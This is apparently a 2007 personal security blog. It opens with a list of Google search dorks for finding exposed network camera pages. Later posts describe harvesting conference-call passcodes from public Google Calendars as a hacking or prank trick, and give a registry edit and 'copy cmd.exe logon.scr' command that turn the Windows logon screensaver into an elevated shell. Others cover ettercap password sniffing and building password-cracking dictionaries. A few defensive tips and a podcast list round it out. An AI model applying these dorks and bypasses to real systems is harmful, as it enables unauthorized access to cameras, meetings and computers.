intitle:"WJ-NT104 Main Page"
intext:"MOBOTIX M1" intext:"Open Menu"
intext:"MOBOTIX M10" intext:"Open Menu"
intext:"MOBOTIX D10" intext:"Open Menu"
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:"sony network camera snc-p1"
intitle:"sony network camera snc-m1"
site:.viewnetcam.com -www.viewnetcam.com
intitle:"Toshiba Network Camera" user login
intitle:"netcam live image"
intitle:"i-Catcher Console - Web Monitor"

posted on Monday, May 14, 2007 11:27:42 AM (Pacific Daylight Time, UTC-07:00)
# Wednesday, May 02, 2007

If you're smart like me you realize what this image shows. If you log into Google Calendar you will have this new search feature; you will also notice what I searched for. You can be creative with the terms you use (I used passcode, like conference call passcode); you now have a hacking trick or simply a great prank phone call method. – Idea spawned by the PaulDotCom security podcast.

Calandar

Social engineering at its best. Also, prevent this by NOT MARKING YOUR CALENDAR PUBLIC, or just don't put secure information in Google.

posted on Wednesday, May 02, 2007 10:57:46 AM (Pacific Daylight Time, UTC-07:00)
# Tuesday, May 01, 2007

(Access Point)——Irongeek Ettercap Script———Gateway

This is something sort of fun that I just installed on my home wireless. It's actually very educational: you can learn what type of code sends clear-text passwords and what will not. Most interesting is using sites that attempt to prevent this type of attack and put fun data in the password fields. I installed ettercap in bridge mode so I have layer 1 access to the data. (Granted that ettercap did this all along; this is just a fun way to show it off.)

posted on Tuesday, May 01, 2007 8:44:44 PM (Pacific Daylight Time, UTC-07:00)
# Sunday, April 29, 2007

A simple trick to get an elevated command line from the screen saver. There are many ways to enter this data; one fast trick is to use a Linux registry editor, and it's as simple as making the logon screen saver the command window. It also works to do a command line of “copy cmd.exe logon.scr”; this will work anywhere but on domain controllers not booted in recovery mode. This is preventable with PGP disk encryption.

Windows Registry Editor Version 5.00

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"ScreenSaverIsSecure"="0"
"ScreenSaveTimeOut"="15"
"ScreenSaveActive"="1"
"SCRNSAVE.EXE"="cmd.exe"

The OEM data you changed from:

Windows Registry Editor Version 5.00

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"ScreenSaverIsSecure"="0"
"ScreenSaveTimeOut"="600"
"ScreenSaveActive"="1"
"SCRNSAVE.EXE"="C:\\WINDOWS\\System32\\logon.scr"

posted on Sunday, April 29, 2007 1:46:29 AM (Pacific Daylight Time, UTC-07:00)
# Monday, April 16, 2007

If you own a PC that the public can get to – laptop, library, corporate etc. etc. – disable AutoPlay on the system via Group Policy. Do this to prevent hackers.

Gpoautoplay


posted on Monday, April 16, 2007 3:48:10 PM (Pacific Daylight Time, UTC-07:00)
# Thursday, March 22, 2007
I can never find a common password and user name dictionary, so I created my own. Simple trick: I researched some viruses and pulled the list of user names and passwords they used. Easy. Found a list of the 100 most used passwords and converted them all to .txt files for use with John the Ripper etc. to create fuzz passwords with. I also went and pulled down the default device password lists and converted them out to .txt files so that you can also have them in a list. So it made about 5 text files of passwords that look like nice low-hanging fruit to chomp. You can download my compilation from my blog.

posted on Thursday, March 22, 2007 8:07:52 PM (Pacific Standard Time, UTC-08:00)
# Wednesday, February 07, 2007

The DT-2000 here to eat your data


Other products by the same company

This system detects when a senile elderly patient with aimless behavior leaves the home unexpectedly. When the system detects this behavior, it activates an alarm to notify nursing personnel to secure the individual's safety. Thus, this system enhances the safety of the elderly and eases the burden of nursing care.

posted on Wednesday, February 07, 2007 11:46:48 AM (Pacific Standard Time, UTC-08:00)
# Tuesday, February 06, 2007

I was reading around the web and found this interesting document; it's interviewing a burglar and talking about “where to hide your money”. I point this post out because it has one fun idea: the idea that if you leave some money out that is easy to find, you're less likely to have your house damaged or destroyed, and potentially the crook will leave thinking he stole your good stuff.

This is a fun idea to apply to corporate security.

My first thoughts when I saw the title of the article were “ok, so we print to the public how to keep your stuff safe: hide things in your toilet tank.” Now all of America will put things in the toilet tank. It has this idea to put money in your kids' toys. The concept is new, so crooks won't look there. But like anything, once it's popular it's where crooks go.

posted on Tuesday, February 06, 2007 1:57:01 PM (Pacific Standard Time, UTC-08:00)
# Sunday, January 21, 2007

I have about 30 podcast streams and I listen to about 2–4 a day regularly. I have evaluated a TON of them and my requirements are simple. They can't be dumb; I'm not a huge fan of TechTV because they tell you stupid things that I don't care about. So I try to not have casts that are like that. The other requirement is they are not slow. I don't want to hear a professor. Last, I want updates 3+ times a month. Why? Because security isn't a 1-month update. So here kicks off my list of security-related podcasts. The items in bold I feel are “essential” to your collection if you're security minded. All of the podcasts can be found via iTunes search.

Blue Box VoIP – ok, security related to VoIP, more focused on Vonage and consumer than enterprise.

CNN video Daily – security includes the news so good to get a light dusting.

Crave Video – an OK review of hardware (non security)

Hack A Day – I just respect this site (non security)

InDigital – great video podcast about hardware (non security)

InfoWorld – good enterprise news source

MakeVideo – (non security) MakeBlog

Pauldotcom Security Weekly – great new age security cast

Security Now! – ok news for security; the one host is lame.

Security Wire Weekly – good weekly news

This Week in Tech – mostly the people I don't like from other podcasts

Windows Weekly – ok news for windows.

posted on Sunday, January 21, 2007 6:56:39 PM (Pacific Standard Time, UTC-08:00)
# Wednesday, January 17, 2007